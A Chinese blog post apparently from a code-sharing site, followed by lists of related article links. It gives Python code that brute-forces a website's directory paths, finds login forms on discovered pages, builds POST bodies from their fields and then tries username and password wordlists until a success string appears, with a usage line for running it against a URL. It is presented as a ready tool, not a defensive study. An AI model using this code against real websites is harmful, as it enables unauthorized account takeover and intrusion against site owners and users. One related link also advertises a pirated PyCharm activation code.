python遍历路径破解表单的示例


Posted in Python onNovember 21, 2020

首先是利用python遍历路径,采用字典爆破的形式,当然如果只是单纯的爆破路径,简单写一个多线程脚本就行了。这里考虑如何对爆破到的路径进行第二步利用,此处尝试对猜解到的路径进行表单发现及登陆爆破处理。

​首先就是路径爆破,采用多线程队列,爆破路径,判断形式为200响应码。

while not self._queue.empty():
      queue = self._queue.get(timeout=0.5)
      try:
        r = requests.get(self.url+queue,timeout=5, headers=self.headers)
        if r.status_code == 200:
          print "[200] %s" %(queue)
          soup = BeautifulSoup(r.content,'html.parser')
          if soup.find('form'):
            self.brute(soup, queue)

猜解到路径后交给brute方法处理,方法实现了一个css选择器,获取form表单中的input字段标签,提取标签参数组合成post参数值,然后提取表单中的action跳转页面,如没有页面默认在当前表单页提交。

input = soup.select("form input")
      for i in input:
        try:
          if i.attrs['type'] == "hidden":
            name, value = i.attrs['name'], i.attrs['value']
            list_post.append(name+'='+value)
          elif i.attrs['type'] == 'password':
            name = i.attrs['name']
            list_post.append(name+'=$$$')
          else:
            name = i.attrs['name']
            list_post.append(name+'=%%%')
        except:
          continue
      for i in list_post:
        post = post + i + '&'
      action = soup.find_all('form')
      for i in action:
        if i['action']:
          actiontag = i['action']
        else:
          actiontag = queue
      self.payload(post, actiontag)

获取参数值后,交给payload方法处理登陆,采用requests库的session登陆。获取cookie,先采用session请求获取cookie后,再采用session携带cookie进行请求提交。然后对输入的验证值进行判断是否为登陆成功。

for name in self.username():
      post_user = post.replace('%%%',name.strip())
      for pwd in self.password():
        post_pwd = post_user.replace('$$$',pwd.strip())
        session = requests.Session()
        session.get(self.url+'/'+action, headers=self.headers, verify=False)
        r = session.post(self.url+'/'+action, data=post_pwd, headers=self.headers, verify=False)
        if self.word in r.content:
          print '[username] %s' %name +'\r' + '[password] %s' %pwd
          return

为了判断是否登陆成功,采用的人为输入判断字符串的形式。也就是脚本执行形式为

python xxx.py http://xxxx.com xxxxx

以上就是python遍历路径破解表单的示例的详细内容,更多关于python 破解表单的资料请关注三水点靠木其它相关文章!

Python 相关文章推荐
Python生成验证码实例
Aug 21 Python
基于python编写的微博应用
Oct 17 Python
Hadoop中的Python框架的使用指南
Apr 22 Python
python实现RSA加密(解密)算法
Feb 17 Python
python 通过logging写入日志到文件和控制台的实例
Apr 28 Python
python爬虫获取新浪新闻教学
Dec 23 Python
Pytorch实现GoogLeNet的方法
Aug 18 Python
pytorch实现用Resnet提取特征并保存为txt文件的方法
Aug 20 Python
python爬虫 正则表达式解析
Sep 28 Python
python 实现单通道转3通道
Dec 03 Python
Python dict和defaultdict使用实例解析
Mar 12 Python
python pyqtgraph 保存图片到本地的实例
Mar 14 Python
Python如何批量生成和调用变量
Nov 21 #Python
在终端启动Python时报错的解决方案
Nov 20 #Python
python 批量下载bilibili视频的gui程序
Nov 20 #Python
Python ellipsis 的用法详解
Nov 20 #Python
python 动态渲染 mysql 配置文件的示例
Nov 20 #Python
Python paramiko使用方法代码汇总
Nov 20 #Python
分享一枚pycharm激活码适用所有pycharm版本我的pycharm2020.2.3激活成功
Nov 20 #Python
You might like
Windows 下的 PHP-PEAR 安装方法
2010/11/20 PHP
PHP获取QQ达人QQ信息的方法
2015/03/05 PHP
浏览器缩放检测的js代码
2014/09/28 Javascript
javascript中eval解析JSON字符串
2016/02/27 Javascript
浅谈jQuery中ajaxPrefilter的应用
2016/08/01 Javascript
JS基于HTML5的canvas标签实现炫目的色相球动画效果实例
2016/08/24 Javascript
Node解决简单重复问题系列之Excel内容的获取
2018/01/02 Javascript
Vue2.2.0+新特性整理及注意事项
2018/08/22 Javascript
Vue-Quill-Editor富文本编辑器的使用教程
2018/09/21 Javascript
JavaScript数组特性与实践应用深入详解
2018/12/30 Javascript
Vue.js组件使用props传递数据的方法
2019/10/19 Javascript
详解Python中的序列化与反序列化的使用
2015/06/30 Python
由浅入深讲解python中的yield与generator
2017/04/05 Python
python爬虫框架scrapy实战之爬取京东商城进阶篇
2017/04/24 Python
基于python3 类的属性、方法、封装、继承实例讲解
2017/09/19 Python
Python实现 版本号对比功能的实例代码
2019/04/18 Python
python随机模块random使用方法详解
2020/02/14 Python
Matplotlib使用字符串代替变量绘制散点图的方法
2020/02/17 Python
基于tensorflow for循环 while循环案例
2020/06/30 Python
Python Http请求json解析库用法解析
2020/11/28 Python
Melijoe英国官网:法国儿童时尚网站
2016/11/18 全球购物
JAVA中运算符的分类及举例
2015/09/12 面试题
前台接待岗位职责
2013/12/03 职场文书
中专生自我鉴定范文
2013/12/19 职场文书
开办化妆品公司创业计划书
2013/12/26 职场文书
自动化专业个人求职信范文
2013/12/30 职场文书
房屋转让协议书
2014/04/11 职场文书
《沉香救母》教学反思
2014/04/19 职场文书
班主任工作经验交流材料
2014/05/13 职场文书
如何写股份合作协议书
2014/09/11 职场文书
求职简历自荐信怎么写
2015/03/26 职场文书
党支部工作总结2015
2015/04/01 职场文书
金砖之国观后感
2015/06/11 职场文书
2015暑期爱心支教策划书
2015/07/14 职场文书
go语言求任意类型切片的长度操作
2021/04/26 Golang
SQL解决未能删除约束问题drop constraint
2022/05/30 SQL Server